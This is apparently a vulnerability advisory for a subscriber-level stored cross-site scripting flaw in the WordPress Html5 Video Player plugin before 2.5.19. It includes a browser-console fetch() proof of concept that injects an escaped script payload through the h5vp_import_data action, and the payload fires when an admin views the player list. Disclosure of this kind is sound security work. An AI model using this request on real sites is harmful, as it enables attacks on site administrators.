Html5 Video Player < 2.5.19 - Subscriber+ Stored XSS

2023-12-0800:00:00

Krzysztof Zając (CERT PL)

html5 video player

subscriber+

stored xss

developer console

fetch command

exploit

web browser

admin view

player lists

5.6 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.2%

JSON

Description The plugin does not sanitise and escape some of its player settings, which combined with missing capability checks around the plugin could allow any authenticated users, such as low as subscribers to perform Stored Cross-Site Scripting attacks against high privilege users like admins

Run the below command in the developer console of the web browser while being on the blog as a subscriber user (id=14 being the ID of an existing video player from the plugin)

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type":"application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=h5vp_import_data&id=14&content={\"h5vp_total_views\":\"\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\\u003b\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\"}",
  "method": "POST",
}).then((response) => {return response.text();    }).then((data) => {console.log(data);})

The XSS will be triggered when an admin will view the player lists (ie https://example.com/wp-admin/edit.php?post_type=videoplayer)